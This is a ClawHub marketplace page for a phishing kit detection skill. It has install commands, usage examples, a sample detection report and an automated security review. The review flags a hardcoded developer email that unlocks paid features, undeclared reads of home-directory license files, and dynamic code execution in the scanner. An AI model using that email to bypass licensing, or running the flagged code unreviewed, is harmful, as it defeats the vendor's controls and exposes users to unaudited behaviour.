ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

EdgeIQ Phishing Kit Detector

v1.0.0

Detects phishing kit artifacts, brand impersonation, suspicious JavaScript, and infrastructure on URLs or local HTML to identify phishing kit clones.

0· 15·0 current·0 all-time
by@snipercat69

Install

OpenClaw Prompt Flow

Install with OpenClaw

Best for remote or guided setup. Copy the exact prompt, then paste it into OpenClaw for snipercat69/edgeiq-phishing-kit-detector.

Previewing Install & Setup.
Prompt PreviewInstall & Setup
Install the skill "EdgeIQ Phishing Kit Detector" (snipercat69/edgeiq-phishing-kit-detector) from ClawHub.
Skill page: https://clawhub.ai/snipercat69/edgeiq-phishing-kit-detector
Keep the work scoped to this skill only.
After install, inspect the skill metadata and help me finish setup.
Use only the metadata you can verify from ClawHub; do not invent missing requirements.
Ask before making any broader environment changes.

Command Line

CLI Commands

Use the direct CLI path if you want to install manually and keep every step visible.

OpenClaw CLI

Canonical install target

openclaw skills install snipercat69/edgeiq-phishing-kit-detector

ClawHub CLI

Package manager switcher

npx clawhub@latest install edgeiq-phishing-kit-detector
Security Scan
Capability signals
CryptoCan make purchases
These labels describe what authority the skill may exercise. They are separate from suspicious or malicious moderation verdicts.
VirusTotalVirusTotal
Benign
View report →
OpenClawOpenClaw
Suspicious
medium confidence
Purpose & Capability
The code implements phishing detection functionality (URL fetch, HTML/JS analysis, brand signatures) consistent with the description. However the skill metadata declares no required env vars/config paths while the runtime uses a license file (~/.edgeiq/license.key) and an EDGEIQ_EMAIL environment variable to enable Pro/Bundle features, which is not declared in the registry metadata.
!
Instruction Scope
SKILL.md instructs running the scanner (including examples that set EDGEIQ_EMAIL) and to copy files into the OpenClaw skills directory. The runtime code reads files under the user's home (~/.edgeiq/*) and will fetch remote URLs (exposes the agent's IP to targets). The instructions do not explicitly document the license-file read behavior or the hardcoded developer email that grants bundle access, giving the agent/distributor discretion not disclosed in metadata.
Install Mechanism
No install spec is provided (instruction-only plus bundled Python files). There are no downloads, archive extractions, or third-party package installs in the manifest — this reduces install-time risk. The README references a GitHub repo for cloning, but the packaged files are present so no external installer is required.
!
Credentials
Metadata lists no required environment variables or config paths, but the code uses EDGEIQ_EMAIL and checks a per-user license file in the home directory (~/.edgeiq/license.key and related files). Additionally, the licensing code includes a hardcoded email (gpalmieri21@gmail.com) that will unlock Pro/Bundle features if that email is set, which is an unexpected and disproportionate means of elevating feature access.
Persistence & Privilege
The skill does not request 'always' presence and appears not to modify other skills or system-wide settings. It does read files from the user's home (~/.edgeiq/*) which is a persistent per-user path not declared in requirements — this is noteworthy but not an elevated privilege by itself.
What to consider before installing
This tool appears to perform the phishing scans it claims to, but there are a few red flags you should consider before installing or running it: - Licensing/backdoor: The shipped licensing logic contains a hardcoded developer email (gpalmieri21@gmail.com) that grants Pro/Bundle features if you set EDGEIQ_EMAIL to that value. That is an unexpected backdoor for unlocking premium features and could be abused or indicate sloppy/unaudited code. - Undeclared config access: The scanner reads a per-user license file under ~/.edgeiq/license.key and possibly other files in ~/.edgeiq, but the skill metadata declares no required config paths. If you care about privacy or potential collisions with other tools, inspect or sandbox this behavior. - Provenance: The skill’s source is listed as 'unknown' and the README points to a third-party GitHub username. If you rely on this tool for sensitive analysis, prefer packages with clear provenance, signed releases, or review the entire codebase yourself. - Network/operational risk: The scanner will perform network requests to any URL you scan. Scanning remote sites reveals your IP and may trigger retaliatory or tracking behavior from malicious infrastructures. For risky targets, prefer offline/local HTML dumps and run the tool in an isolated environment. - Inconsistencies: The SKILL.md, README, and included licensing code show inconsistent pricing/links and multiple variations of license-check logic — this suggests the project may have been cobbled together from versions and hasn't been audited. Recommendations: - Inspect the full phishing_detector.py and edgeiq_licensing.py files yourself (or have a trusted reviewer do so). The manifest includes the source; look specifically for any network calls beyond fetching the target, filesystem writes, or hardcoded external endpoints. - Do not set EDGEIQ_EMAIL to the developer email to 'unlock' Pro features — that defeats licensing and could indicate malicious intent. - Run the tool in a sandbox or isolated VM when testing (so the scanner's network/disk access is contained). - Prefer a skill with a clear source repo, signed releases, or a maintainer you can verify if you plan to use it operationally. If you want, I can (1) scan the rest of phishing_detector.py for patterns that read other sensitive files or contact unexpected endpoints, or (2) produce a short list of specific lines to inspect in the licensing module and network code.
phishing_detector.py:377
Dynamic code execution detected.
Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.

Like a lobster shell, security has layers — review code before you run it.

latestvk973yz81c82ddkxvfxt2y7d75x85e9t7
15downloads
0stars
1versions
Updated 3h ago
v1.0.0
MIT-0
@snipercat69
latest
Download

Phishing Kit Detector

Skill Name: phishing-kit-detector Version: 1.0.0 Category: Security / Phishing / OSINT Price: Free (basic) / Pro ($19/mo) / Bundle ($39/mo) Author: EdgeIQ Labs OpenClaw Compatible: Yes — Python 3, pure stdlib, WSL + Linux

What It Does

Detects phishing kit artifacts, brand impersonation, form action URLs, stolen branding, suspicious JavaScript, and credential harvesting infrastructure. Analyzes live URLs or local HTML dumps to determine if a page is a phishing kit clone.

⚠️ Legal Notice: Only analyze domains you own or have explicit written authorization to audit. Not for unauthorized scanning of third-party sites.

Features

  • Phishing artifact detection — form action URLs pointing to credential capture endpoints, hidden fields, credential autocomplete
  • Brand impersonation analysis — detects brand logos, CSS frameworks, and imagery copied from legitimate sites
  • Infrastructure fingerprinting — shared/free hosting detection, suspicious TLDs, URL path patterns
  • JavaScript analysis — credential harvesting scripts, redirect chains, keyloggers, obfuscated callbacks
  • Stolen branding detection — references to legitimate brand assets, fake SSL badges, trust seals
  • URL structure analysis — phishing-specific URL path patterns (login, account, verify, secure)
  • JSON export — structured forensic report

Tier Comparison

FeatureFreePro ($19/mo)Bundle ($39/mo)
URL scan✅ (5 scans)✅ (50 scans)✅ (unlimited)
Local file scan
Brand impersonation check
JS analysis
Infrastructure fingerprinting
Stolen branding detection
JSON export

Installation

cp -r /home/guy/.openclaw/workspace/apps/phishing-kit-detector ~/.openclaw/skills/phishing-kit-detector

Usage

Basic URL scan (free tier)

python3 phishing_detector.py --url "https://suspicious-site.com/login"

Local HTML file scan (Pro)

EDGEIQ_EMAIL=your_email@gmail.com python3 phishing_detector.py \
  --file /path/to/phishing_page.html --pro

Brand impersonation check (Pro)

python3 phishing_detector.py --url "https://fake-paypal.com" \
  --brands paypal,amazon,apple --pro

Full bundle analysis + JSON export

EDGEIQ_EMAIL=your_email@gmail.com python3 phishing_detector.py \
  --url "https://phishing-site.net" --bundle --output report.json

Parameters

FlagTypeDefaultDescription
--urlstringPhishing URL to analyze
--filestringPath to local HTML file
--brandsstringComma-separated brand list (paypal,amazon,apple,google,microsoft,facebook,instagram,twitter,netflix,linkedin)
--proflagFalseEnable Pro features
--bundleflagFalseEnable Bundle features
--outputstringWrite JSON report to file

Brand List

Supported brands for impersonation detection: paypal · amazon · apple · google · microsoft · facebook · instagram · twitter · netflix · linkedin · ebay · salesforce · dropbox · slack · zoom · steam · epic games · steam · yahoo · cnn · chase · bank of america · wells fargo · capital one

Output Example

=== Phishing Kit Detector ===
Analyzing: https://fake-paypal.com/account/verify

  🔴 PHISHING KIT DETECTED (98% confidence)
  
  Artifact Analysis:
    Form action → credential harvest endpoint detected
    Hidden field → password re-entry field (credential capture)
    Credential autocomplete → enabled on sensitive fields
    Multiple forms → login + payment + PIN entry

  Brand Impersonation:
    Detected: PayPal (logo, CSS framework, brand colors)
    Stolen assets: 3 CSS files, 2 images from paypal.com
    Fake SSL badge detected

  Infrastructure:
    Free hosting provider detected (Freenom .tk domain)
    Suspicious TLD: .tk — commonly used in phishing
    Redirect chain: 2 hops before landing page
    Shared hosting IP — multiple malicious sites on same IP

  JavaScript Findings:
    Credential harvester script detected
    Keylogger injection found
    Redirect to: paypal.com.legit-site.ru

  Threat Level: CRITICAL — Sophisticated phishing kit with credential harvesting + keylogger

Pro Upgrade

Full phishing kit analysis + brand impersonation + JS analysis + infrastructure fingerprinting:

👉 Upgrade to Pro — $19/mo

Support

Open a ticket in #edgeiq-support or email gpalmieri21@gmail.com

Comments

Loading comments...